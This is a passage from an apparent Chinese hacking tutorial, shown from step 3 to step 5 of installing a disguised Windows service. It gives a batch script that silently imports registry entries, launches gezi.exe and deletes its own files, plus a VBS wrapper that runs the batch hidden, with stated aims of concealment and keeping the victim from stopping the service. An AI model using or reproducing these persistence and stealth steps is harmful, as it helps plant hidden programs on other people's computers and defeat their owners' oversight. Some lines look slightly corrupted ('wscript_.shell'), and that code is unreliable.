这里的目的是迷惑别人,使其不敢轻易停止我们生成的服务。
3.将这些从注册表导出,我们将他命名为1.reg
4.创建一个BAT文件,并命名为update.bat
@regedit /s %systemroot%\system32\1.reg
@%systemroot%\system32\gezi.exe
@del /q /f /s %systemroot%\system32\1.reg
@del /q /f /s %systemroot%\system32\Update.vbs
@del /q /f /s %systemroot%\system32\Update.bat
5.创建一个vbs并命名为update.vbs
目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd 窗口跳出来了,增加了不少隐蔽性.代码如下:
On Error Resume Next
set wshshell=createobject ("wscript_.shell")
a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)